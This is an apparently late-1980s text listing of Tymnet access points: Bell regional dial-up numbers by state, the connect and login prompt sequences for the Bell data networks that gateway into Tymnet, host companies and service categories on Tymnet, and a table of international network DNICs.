+02727 Bristol              CT  USA  MED   B B  C     203/589-5100 N @CONNNET
+02727 Canaan               CT  USA  MED   B B  C     203/824-5103 N @CONNNET
+02727 Clinton              CT  USA  MED   B B  C     203/669-4243 N @CONNNET
+02727 Danbury              CT  USA  MED   B B  C     203/743-2906 N @CONNNET
+02727 Danielson            CT  USA  MED   B B  C     203/779-1880 N @CONNNET
+02727 Hartford/Middletown  CT  USA  MED   B B  C     203/724-6219 N @CONNNET
+02727 Meriden              CT  USA  MED   B B  C     203/237-3460 N @CONNNET
+02727 New Haven            CT  USA  MED   B B  C     203/776-1142 N @CONNNET
+02727 New London           CT  USA  MED   B B  C     203/443-0884 N @CONNNET
+02727 New Milford          CT  USA  MED   B B  C     203/355-0764 N @CONNNET
+02727 Norwalk              CT  USA  MED   B B  C     203/866-5305 N @CONNNET
+02727 Norwich/New London   CT  USA  MED   B B  C     203/443-0884 N @CONNNET
+02727 Old Greddwich        CT  USA  MED   B B  C     203/637-8872 N @CONNNET
+02727 Old Saybrook         CT  USA  MED   B B  C     203/388-0778 N @CONNNET
+02727 Seymour              CT  USA  MED   B B  C     203/881-1455 N @CONNNET
+02727 Stamford             CT  USA  MED   B B  C     203/324-9701 N @CONNNET
+02727 Storrs               CT  USA  MED   B B  C     203/429-4243 N @CONNNET
+02727 Stratford/Bridgeport CT  USA  MED   B B  C     203/366-6972 N @CONNNET
+02727 Torrington           CT  USA  MED   B B  C     203/482-9849 N @CONNNET
+02727 Waterbury            CT  USA  MED   B B  C     203/597-0064 N @CONNNET
+02727 Willimantic          CT  USA  MED   B B  C     203/456-4552 N @CONNNET
+02727 Windsor              CT  USA  MED   B B  C     203/688-9330 N @CONNNET
+02727 Windsor Lcks/Enfield CT  USA  MED   B B  C     203/623-9804 N @CONNNET
+06254 Washington           DC  USA  MED   B B        202/328-0619 N @PDN
+06254 Washington           DC  USA  MED   B B        202/479-7214 N @PDN
+06254 Washington           DC  USA  MED   B B        202/546-5549 N @PDN
+06254 Washington (Downtown DC  USA  MED   B B        202/393-6003 N @PDN
+06254 Washington (Midtown) DC  USA  MED   B B        202/293-4641 N @PDN
+03526 Dover                DE  USA  MED   B B  C     410/734-9465 N @PDN
+03526 Georgetown           DE  USA  MED   B B  C     302/856-7055 N @PDN
+03526 Newark               DE  USA  MED   B B  C     302/366-0800 N @PDN
+03526 Wilmington           DE  USA  MED        C     302/655-1144 N @PDN
+03526 Wilmington           DE  USA  MED   B B        302/428-0030 N @PDN
+04125 Boca Raton           FL  USA  MED   B B        407/392-4801 N @PLSK
+04125 Ft. Pierce           FL  USA  MED   B B        407/461-0996 N @PLSK
+07064 Jacksonville         FL  USA  MED   B B  C     904/354-1032 N @PLSK
+04125 Miami                FL  USA  MED   B B  C     305/661-0437 N @PLSK
+04125 Plantation           FL  USA  MED   B B  C     305/791-5663 N @PLSK
+07064 St. Augustine        FL  USA  MED   B B        904/825-1101 N @PLSK
+04125 Stuart               FL  USA  MED   B B        407/288-0185 N @PLSK
+04125 W. Hollywood         FL  USA  MED   B B        305/962-8226 N @PLSK
+04125 W. Palm Beach        FL  USA  MED   B B  C     407/842-8990 N @PLSK
+10200 Athens               GA  USA  MED   B B  C     404/613-1289 N @PLSK
+10200 Atlanta              GA  USA  MED   B B        404/261-4633 N @PLSK
+10200 Atlanta              GA  USA  MED   B B  C     404/266-9403 N @PLSK
+10200 Columbus             GA  USA  MED   B B        404/324-5771 N @PLSK
+10200 Rome                 GA  USA  MED   B B        404/234/6542 N @PLSK
+05443 Hays                 KS  USA  MED   B B        913/625-8100 N @MRLK
+05443 Hutchinson           KS  USA  MED   B B        316/669-1052 N @MRLK
+05443 Kansas City          KS  USA  MED   B B        316/225-9951 N @MRLK
+05443 Lawrence             KS  USA  MED   B B        913/841-5580 N @MRLK
+05443 Manhattan            KS  USA  MED   B B        913/539-9291 N @MRLK
+05443 Parsons              KS  USA  MED   B B        316/421-0620 N @MRLK
+05443 Salina               KS  USA  MED   B B        913/825-4547 N @MRLK
+05443 Topeka               KS  USA  MED   B B        913/235-1909 N @MRLK
+05443 Wichita              KS  USA  MED   B B        316/269-1996 N @MRLK
+06254 Bethesda             MD  USA  MED   B B        301/986-9942 N @PDN
+06254 Colesville           MD  USA  MED   B B  C     301/989-9324 N @PDN
+06254 Hyattsville          MD  USA  MED   B B        301/779-9935 N @PDN
+06254 Laurel               MD  USA  MED   B B  C     301/490-9971 N @PDN
+06254 Rockville            MD  USA  MED   B B        301/340-9903 N @PDN
+06254 Silver Spring        MD  USA  MED   B B        301/495-9911 N @PDN
+04766 Bridgeton/St. Louis  MO  USA  MED   B B        314/622-0900 N @MRLK
+04766 St. Louis            MO  USA  MED   B B        314/622-0900 N @MRLK
+11060 Chapel Hill          NC  USA  MED   B B        919/933-2580 N @PLSK
+11060 Durham               NC  USA  MED   B B        919/687-0181 N @PLSK
+11060 Raleigh              NC  USA  MED   B B  C     919/664-8077 N @PLSK
+07771 Bernardsville        NJ  USA  MED   B B  C     908/766-7138 N @PDN
+07771 Clinton              NJ  USA  MED   B B        908/730-8693 N @PDN
+07771 Dover                NJ  USA  MED   B B  C     201/361-9211 N @PDN
+07771 Eatontown/Red Bank   NJ  USA  MED   B B  C     908/758-8000 N @PDN
+07771 Elizabeth            NJ  USA  MED   B B  C     908/289-5100 N @PDN
+07771 Englewood            NJ  USA  MED   B B  C     201/871-3000 N @PDN
+07771 Freehold             NJ  USA  MED   B B  C     908/780-8890 N @PDN
+07771 Hackensack           NJ  USA  MED   B B  C     201/343-9200 N @PDN
+07771 Jersey City          NJ  USA  MED   B B  C     201/659-3800 N @PDN
+07771 Livingston           NJ  USA  MED   B B  C     201/533-0561 N @PDN
+07771 Long Branch/Red Bank NJ  USA  MED   B B  C     908/758-8000 N @PDN
+07771 Madison              NJ  USA  MED   B B  C     201/593-0004 N @PDN
+07771 Metuchen             NJ  USA  MED   B B  C     908/906-9500 N @PDN
+07771 Middletown           NJ  USA  MED   B B  C     908/957-9000 N @PDN
+07771 Morristown           NJ  USA  MED   B B  C     201/455-0437 N @PDN
+07771 New Boundland        NJ  USA  MED   B B  C     201/697-9380 N @PDN
+07771 New Brunswick        NJ  USA  MED   B B  C     908/247-2700 N @PDN
+07771 Newark               NJ  USA  MED   B B  C     201/623-0083 N @PDN
+07771 Passaic              NJ  USA  MED   B B  C     201/473-6200 N @PDN
+07771 Paterson             NJ  USA  MED   B B  C     201/345-7700 N @PDN
+07771 Phillipsburg         NJ  USA  MED   B B  C     908/454-9270 N @PDN
+07771 Pompton Lakes        NJ  USA  MED   B B  C     201/835-8400 N @PDN
+07771 Red Bank             NJ  USA  MED   B B  C     908/758-8000 N @PDN
+07771 Ridgewood            NJ  USA  MED   B B  C     201/445-4800 N @PDN
+07771 Somerville           NJ  USA  MED   B B  C     908/218-1200 N @PDN
+07771 South River          NJ  USA  MED   B B  C     908/390-9100 N @PDN
+07771 Spring Lake          NJ  USA  MED   B B  C     908/974-0850 N @PDN
+07771 Toms River           NJ  USA  MED   B B  C     908/286-3800 N @PDN
+07771 Washington           NJ  USA  MED   B B  C     908/689-6894 N @PDN
+07771 Wayne/Paterson       NJ  USA  MED   B B  C     201/345-7700 N @PDN
+06510 Ada                  OK  USA  MED   B B        405/436-0252 N @MRLK
+06510 Altus                OK  USA  MED   B B        405/477-0321 N @MRLK
+06510 Alva                 OK  USA  MED   B B        405/327-1441 N @MRLK
+06510 Ardmore              OK  USA  MED   B B        405/223-8086 N @MRLK
+      Bartlesville         OK  USA  MED   B B        918/336-6901 N @MRLK
+06510 Clinton              OK  USA  MED   B B        405/323-8102 N @MRLK
+06510 Durant               OK  USA  MED   B B        405/924-2680 N @MRLK
+06510 Enid                 OK  USA  MED   B B        405/242-8221 N @MRLK
+06510 Lawton               OK  USA  MED   B B        405/248-8772 N @MRLK
+      Mcalester            OK  USA  MED   B B        918/426-0900 N @MRLK
+      Miami                OK  USA  MED   B B        918/540-1551 N @MRLK
+      Muskogee             OK  USA  MED   B B        918/683-1114 N @MRLK
+06510 Oklahoma City        OK  USA  MED   B B        405/236-0660 N @MRLK
+06510 Ponca City           OK  USA  MED   B B        405/762-9926 N @MRLK
+      Sallisaw             OK  USA  MED   B B        918/775-7713 N @MRLK
+06510 Shawnee              OK  USA  MED   B B        405/273-0053 N @MRLK
+06510 Stillwater           OK  USA  MED   B B        405/377-5500 N @MRLK
+      Tulsa                OK  USA  MED   B B        918/583-6606 N @MRLK
+06510 Woodward             OK  USA  MED   B B        405/256-9947 N @MRLK
+03526 Allentown            PA  USA  MED   B B        215/435-0266 N @PDN
+      Altoona              PA  USA  MED        C     814/949-0505 N @PDN
+      Altoona              PA  USA  MED   B B        814/946-8639 N @PDN
+03526 Ambler               PA  USA  MED   B B        215/283-2170 N @PDN
+10672 Ambridge             PA  USA  MED   B B        412/266-9610 N @PDN
+10672 Carnegie             PA  USA  MED   B B        412/276-1882 N @PDN
+10672 Charleroi            PA  USA  MED   B B        412/483-9100 N @PDN
+03526 Chester Heights      PA  USA  MED   B B        215/358-0820 N @PDN
+03526 Coatesville          PA  USA  MED   B B        215/383-7212 N @PDN
+10672 Connellsville        PA  USA  MED   B B        412/628-7560 N @PDN
+03526 Downington/Coates.   PA  USA  MED   B B        215/383-7212 N @PDN
+03562 Doylestown           PA  USA  MED   B B        215/340-0052 N @PDN
+03562 Germantown           PA  USA  MED   B B        215-843-4075 N @PDN
+10672 Glenshaw             PA  USA  MED   B B        412/487-6868 N @PDN
+10672 Greensburg           PA  USA  MED   B B        412/836-7840 N @PDN
+      Harrisburg           PA  USA  MED        C     717/238-0450 N @PDN
+      Harrisburg           PA  USA  MED   B B        717/236-3274 N @PDN
+10672 Indiana              PA  USA  MED   B B        412/465-7210 N @PDN
+03526 King of Prussia      PA  USA  MED   B B        215/270-2970 N @PDN
+03526 Kirklyn              PA  USA  MED   B B        215/789-5650 N @PDN
+03526 Lansdowne            PA  USA  MED   B B        215/626-9001 N @PDN
+10672 Latrobe              PA  USA  MED   B B        412/537-0340 N @PDN
+      Lemoyne/Harrisburg   PA  USA  MED   B B        717/236-3274 N @PDN
+10672 McKeesport           PA  USA  MED   B B        412/673-6200 N @PDN
+10672 New Castle           PA  USA  MED   B B        412/658-5982 N @PDN
+10672 New Kensington       PA  USA  MED   B B        412/337-0510 N @PDN
+03526 Norristown           PA  USA  MED   B B        215/270-2970 N @PDN
+03526 Paoli                PA  USA  MED   B B        215/648-0010 N @PDN
+      Philadelphia         PA  USA  MED        C     215/625-0770 N @PDN
+      Philadelphia         PA  USA  MED   B B        215/923-7792 N @PDN
+10672 Pittsburgh           PA  USA  MED        C     412/261-9732 N @PDN
+10672 Pittsburgh           PA  USA  MED   B B        412-687-4131 N @PDN
+10672 Pittsburgh           PA  USA  MED   B B        412/281-8950 N @PDN
+10672 Pottstown            PA  USA  MED   B B        215/327-8032 N @PDN
+03526 Quakertown           PA  USA  MED   B B        215/538-7032 N @PDN
+03526 Reading              PA  USA  MED   B B        215/375-7570 N @PDN
+10672 Rochester            PA  USA  MED   B B        412/728-9770 N @PDN
+03526 Scranton             PA  USA  MED        C     717/341-1860 N @PDN
+03526 Scranton             PA  USA  MED   B B        717/348-1123 N @PDN
+10672 Sharon               PA  USA  MED   B B        412/342-1681 N @PDN
+03526 Tullytown            PA  USA  MED   B B        215/547-3300 N @PDN
+10672 Uniontown            PA  USA  MED   B B        412/437-5640 N @PDN
+03562 Valley Forge         PA  USA  MED   B B        215/270-2970 N @PDN
+10672 Washington           PA  USA  MED   B B        412/223-9090 N @PDN
+03526 Wayne                PA  USA  MED   B B        215/341-9605 N @PDN
+10672 Wilkinsburg          PA  USA  MED   B B        412/241-1006 N @PDN
+06254 Alexandria           VA  USA  MED   B B        703/683-6710 N @PDN
+06254 Arlington            VA  USA  MED   B B        703/524-8961 N @PDN
+06254 Mclean               VA  USA  MED   B B        703/848-2941 N @PDN
+
+B=BELL 103/113 (300 bps) or BELL 212A (1200 bps) compatible modems
+C=CCITT V.21(300 bps) or CCITT V.22 bis(2400 bps) or CCITT V.32 compatible
+  modems.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ B1. Bell Atlantic
+     ~~~~~~~~~~~~~
+@PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN)
+
+       (CONNECT MESSAGE)
+       ...<CR>            (SYNCHRONIZES DATA SPEEDS)
+
+       WELCOME TO THE BPA/DST PDN
+
+       *.T <CR>           (TYMNET ADDRESS)
+
+
+       131069             (ADDRESS CONFIRMATION - TYMNET DNIC)
+       COM                (CONFIRMATION OF CALL SET-UP)
+
+       -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ B2. BellSouth
+     ~~~~~~~~~
+@PLSK  BELLSOUTH - NETWORK NAME IS PULSELINK
+
+       (CONNECT MESSAGE)
+
+       ... <CR>           (SYNCHRONIZES DATA SPEEDS)
+                          (DOES NOT ECHO TO THE TERMINAL)
+       CONNECTED
+       PULSELINK
+
+       13106              (TYMNET ADDRESS)
+                          (DOES NOT ECHO TO THE TERMINAL)
+
+       PULSELINK: CALL CONNECTED TO 1 3106
+
+       -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ B3. Pacific Bell
+     ~~~~~~~~~~~~
+@PPS   PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)
+
+       (CONNECT MESSAGE)
+
+       ...<CR             (SYNCHRONIZES DATA SPEEDS)>
+                          (DOES NOT ECHO TO THE TERMINAL)
+
+       ONLINE 1200
+       WELCOME TO PPS:  415-XXX-XXXX
+       131069             (TYMNET ADDRESS)
+                          (DOES NOT ECHO UNTIL TYMNET RESPONDS)
+
+       -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ B4. Southwestern Bell
+     ~~~~~~~~~~~~~~~~~
+@MRLK - SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R)
+
+       (CONNECT MESSAGE)
+       (PLEASE TYPE YOUR TERMINAL IDENTIFIER)
+
+       A                  (YOUR TERMINAL IDENTIFIER)
+
+       WELCOME TO MICROLINK II
+       -XXXX:01-030-
+       PLEASE LOG IN:
+       .T <CR>            (USERNAME TO ACCESS TYMNET)
+
+
+       HOST: CALL CONNECTED
+
+       -GWY 0XXXX- TYMNET: PLEASE LOG IN:
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ B5. Southern New England Telephone
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+@CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONNNET
+
+       (CONNECT MESSAGE)
+
+       HH<CR>                 (SYNCHRONIZES DATA SPEEDS)
+                              (DOES NOT ECHO TO THE TERMINAL)
+       CONNNET
+
+       .T<CR>                 (MUST BE CAPITAL LETTERS)
+
+       26-SEP-88   18:33      (DATA)
+       031069                 (ADDRESS CONFIRMATION)
+       COM                    (CONFIRMATION OF CALL SET-UP)
+
+       -GWY OXXXX-TYMNET: PLEASE LOG IN:
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ C. Database or Timesharing Companies on Tymnet
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+APCUG "GLOBALNET" BBS
+Bloodstock Research Information
+BRS Information Technologies
+BT, North America (Dialcom)
+Cartermill, Inc.
+Charles Schwab and Company, Inc.
+Chemical Abstracts Services (CAS)
+Commercial SABRE
+Commodity Systems, Inc.
+CompuServe, Inc.
+Compusource
+Computer Intelligence
+Connect, Inc.
+Creative Automation Co.
+Delphi
+Dialog Information Services, Inc.
+Digital Equipment Corp.
+Diversified Network Applications, Inc.
+Dow Jones & Company, Inc.
+Dun and Bradstreet
+Electronic Data Systems Corp.
+Export Network, Inc.
+Gibson Information Systems (GIS)
+Global Interconnect Communications, Inc.
+Idioma Translation
+Interactive Data Corp.
+Jeppesen DataPlan
+Mead Data Central
+Metro On-Line Services, Ltd.
+National Library of Medicine (NLM)
+NewsNet, Inc.
+Nikkei Telecom Japan
+Nuclear Power Experience
+OCR Services, Inc.
+Official Airline Guide (OAG)
+ORBIT Search Service
+Power Computing Company
+Rand McNally - TDM, Inc.
+Real Estate Investment Network
+SeniorNet
+Southeast Regional Data Center (SERDAC)
+SPEED>S Corporation
+The Jockey Club Information Systems
+TRW Business Credit Division
+TRW Information Services
+USA TODAY Sports Center
+West Publishing Company (WEST)
+Xerox Computer Services (XCS)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ D. Service Classifications For Database or Timesharing Companies Using Tymnet
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+MAJOR CATEGORIES:
+
+           Business                          Investments
+           Communications                    Legal
+           Computers                         Livestock
+           Economics                         Marketing
+           Education                         Medicine
+           Electronic Mail                   Natural Resources
+           Environment                       Real Estate
+           Finance                           Safety
+           Games                             Science
+           General Interest                  Sports
+           Government                        Trade
+           Health Care                       Transportation
+           Insurance                         Travel
+           International
+
+
+OTHER CATEGORIES
+
+           Accounting                        Law
+           Airlines                          Management
+           Asia                              Manufacturing
+           Aviation                          Market Analysis
+           Batch (Processing)                Mines
+           Car                               Network
+           Chats                             News
+           Chemistry                         Nuclear Power
+           Commodities                       Outsourcing
+           Computing                         Patents
+           Conferences                       PC
+           Corporate                         Racing
+           Credit (Business or Consumer)     Records
+           Data (Processing)                 Registration
+           Direct Marketing                  Research
+           Disaster Recovery                 Reservations
+           DMV                               RJE
+           Electric Power                    Route Planning
+           Engineering                       Schedules
+           Export                            SEC
+           Fax Services                      Securities
+           Fictitious Names                  Software
+           Flight Plans                      Tax
+           Hotel                             Timesharing
+           Horses                            Translation
+           Information                       UCC
+           Instruction                       User Group
+           IRS (Internal Revenue Service)    Vendors
+           Japan                             Weather
+           Languages
+
+
+BT TYMNET's Global Network Service (GNS) combines three level of international
+services:
+
+    1.  BT TYMNET GLOBAL NETWORK CONNECTION SERVICE
+    2.  ENHANCED GLOBAL CONNECTION SERVICE
+    3.  BASIC GLOBAL CONNECTION SERVICE
+
+BT TYMNET GLOBAL NETWORK CONNECTION SERVICE (TGN) is currently offered in the
+following countries:
+
+        Australia       Netherlands
+        Belgium         New Zealand
+        Canada          Spain
+        Denmark         Sweden
+        France          Switzerland
+        Germany         United Kingdom
+        Italy           United States
+        Japan  
+
+BT TYMNET GLOBAL NETWORK CONNECTION SERVICE are BT TYMNET owned and operated
+sites and equipment.  Global, Regional and local support is provided end-to-end
+by BT TYMNET's trained and experienced technical staff, in place worldwide
+since 1977.  Round the clock coverage for trouble reporting and response on
+critical problems is provided.  BT TYMNET Global Network Service enhanced
+pricing, local currency billing and end-user billing is available.
+
+
+ENHANCED GLOBAL CONNECTION SERVICE (EGC) complement the service described above
+and is currently available from the following locations:
+
+        Alaska (USA)*               Israel
+        Antigua                     Italy
+        Argentina                   Jamaica
+        Australia                   Korea
+        Austria                     Netherland Antilles
+        Bahama                      Panama
+        Bahrain                     Peru
+        Barbados                    Philippines
+        Belgium                     Puerto Rico*
+        Bermuda                     Saudi Arabia
+        Cayman Islands              Sweden
+        Denmark                     Switzerland
+        Dominican Republic          Tortola
+        France                      Trinidad and Tobago
+        Germany                     United Kingdom
+        Guam*                       US Virgin Islands
+        Guatemala
+        Honduras
+        Hong Kong
+
+    *  USA Domestic services and rates apply
+
+
+ENHANCED GLOBAL CONNECTION SERVICE is offered by a local Telecommunication
+Administration equipped with BT TYMNET technology.  In many instances the
+administration is using BT TYMNET's Network Supervisors to operate the packet
+service in their area.
+
+All ENHANCED GLOBAL CONNECTION SERVICE locations offer direct TYM2 (TYMNET's
+proprietary) protocol connection to the BT TYMNET Public Network and thus may
+offer BT TYMNET's comprehensive array of enhanced protocol services.  Most
+currently offer BT TYMNET asynchronous access and X.25 service.  Naturally, a
+close affinity exists between BT TYMNET and ENHANCED GLOBAL CONNECTION SERVICE
+providers so a very high degree of service and support exists in these
+locations.  TYMUSA, a universal dial-up service which is billed back to the
+customer's home office, is offered from all the above locations.
+
+BASIC GLOBAL CONNECTION SERVICE (BGC) completes the full range of international
+connectivity and is currently available from the following locations:
+
+    Antigua             Greenland*          Panama
+    Argentina           Gudaelope*          Peru
+    Australia           Guam & Saipan       Philippines
+    Austria             Guatemala           Portugal
+    Bahamas             Honduras            Puerto Rico
+    Bahrain             Hong Kong           Qatar
+    Barbados            Hungary             Reunion Island
+    Belgium             Iceland             Saudi Arabia
+    Bermuda             India               San Marino*
+    Brazil              Indonesia           Senegal*
+    Canada              Ireland             Singapore
+    Cayman Islands      Israel              South Africa
+    Chile               Italy               South Korea
+    China               Ivory Coast         Spain
+    Colombia            Jamaica             Sweden
+    CostaRica           Japan               Switzerland
+    Curacao             Kuwait              Taiwan
+    Cyprus*             Luxembourg          Thailand
+    Denmark             Macau*              Tortola (BVI)*
+    Djibouti*           Malaysia            Trinidad & Tobago
+    Dominican Republic  Malta*              Tunisia*
+    Egypt               Mauritius*          Turkey
+    Faroe Islands*      Mexico              UAE
+    Finland             Mozambique*         US Virgin Islands
+    France              Nth. Antilles*      USSR
+    French Antilles     Netherlands         United Kingdom
+    French Guiana       New Caledonia*      United States
+    French Polynesia*   New Zealand         Uruguay
+    Gabon               Northern Marianas   Vanuatu*
+    Gambia              Norway              Yugoslavia*
+    Germany                                 Zimbabwe
+    Greece
+
+    * Information will be available on the next update
+
+BASIC GLOBAL CONNECTION SERVICE providers connect their networks to BT TYMNET
+exclusively via X.75 protocol gateways.  The CCITT recommendation X.75 is
+closely related to the better known CCITT X.25 recommendation and provides a
+reliable communication channel for interworking between Public Data Networks.
+
+As a supplier of network technology to US IRC's and foreign carriers for more
+than 10 years, BT TYMNET has a wealth of experience with the X.75 standard and
+actively participates in its development.  BT TYMNET X.75 software has evolved
+into a sophisticated product providing numerous advanced features not found in
+other X.75 implementations.  BT TYMNET maintains and supports more X.75 gateway
+links than any other network in the world.
+
+All of BT TYMNET's X.75 gateways are supported by BT TYMNET's International
+Network Services (INS) group which ensures that all the gateways are configured
+to provide a uniform  interface to BT TYMNET regardless of the origination
+network.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ E. Summary of Global Network Services By Country
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Note:  TYMNET GLOBAL NETWORK (TGN) use BT TYMNET's assigned DNIC of 3106.  The
+       other DNICs listed in the table below are the DNICs of the ENHANCED
+       GLOBAL CONNECTION (EGC) and BASIC GLOBAL CONNECTION (BGC) service
+       providers.
+
+COUNTRY        |   TGN  || DNIC/Network    >>    EGC   |   BGC  |
+---------------|--------||----------------->>----------|--------|
+Alaska         |        || 3135/Alascom    >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Antigua        |        || 3443/Aganet     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Argentina      |        || 7220/ARPAC      >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Argentina      |        || 7222/ARPAC      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Australia      |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Australia      |        || 5052/AUSPAC     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Australia      |        || 5053/MIDAS      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Austria        |        || 2322/DATEX-P    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Austria        |        || 2329/RADIO AUST >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Bahamas        |        || 3640/BaTelCo    >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Bahrain        |        || 4263/BAHNET     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Barbados       |        || 3423/IDAS       >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Belgium        |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Belgium        |        || 2062/DCS        >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Belgium        |        || 206/DCS         >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Belgium        |        || 2069/DCS        >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Bermuda        |        || 3503/Bermudanet >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Brazil         |        || 7240/Interdata  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Brazil         |        || 7241/Renpac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Cameroun       |        || 6261/Campac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Canada         |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Canada         |        || 3020/Datapac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Canada         |        || 3025/Globedat   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Canada         |        || 3028/CNCP-PACKET>>          |        |
+               |        ||      Network    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Canada         |        || 3029/CNCP-INFO  >>          |        |
+               |        ||      SWITCH     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Cayman Islands |        || 3463/IDAS       >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Chile          |        || 3104/Entel      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Chile          |        || 7302/Entel      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Chile          |        || 7303/Chile-PAC  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Chile          |        || 7305/VTR        >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+China          |        || 4600/PTELCOM    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+China          |        || 4602/CHINAPAK   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Columbia       |        || 7320/DAPAQ      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Columbia       |        || 7322/COLDAPAQ   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Costa Rica     |        || 7122/RACSAPAC   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Costa Rica     |        || 7129/RACSAPAC   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Cyprus         |        || 2802/Cytapac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Cyprus         |        || 2803/Cytapac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Cyprus         |        || 2808/Cytapac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Cyprus         |        || 2809/Cytapac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Denmark        |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Denmark        |        || 2382/Datapak    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Denmark        |        || 2383/Datapak    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Djibouti       |        || 6328/Djipac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Dominican Rep  |        || 3700/UDTS-I     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Egypt          |        || 6020/ARENTO     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Egypt          |        || 6023/EGYPTNET   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Faroe Islands  |        || 2881/Faroepac   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Finland        |        || 2442/Datapak    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+France         |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+France         |        || 2080/Transpac   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+France         |        || 2081/NTI        >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Fr Antillies   |        || 3400/Dompac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Fr Guiana      |        || 7420/Dompac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Fr. Polynesia  |        || 5470/Tompac     >>          |        |
+---------------|--------||----------------->>----------|--------|
+Gabon          |        || 6282/Gabonpac   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Germany F.R    |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Germany F.R    |        || 2624/DATEX-P    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Greece         |        || 2022/Helpak     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Greece         |        || 2023/Hellaspac  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Greenland      |        || 2901/KANUPAX    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Guadeloupe     |        || 3441/           >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Guam           |        || 5351/PCINET     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Guatemala      |        || 7043/GAUTEL     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Honduras       |        || 7080/HONDUTEL   >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Hong Kong      |        || 4542/INTELPAK   >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Hong Kong      |        || 4545/DATAPAK    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Hong Kong      |        || 4546/DATAPAC    >>          |   X    |
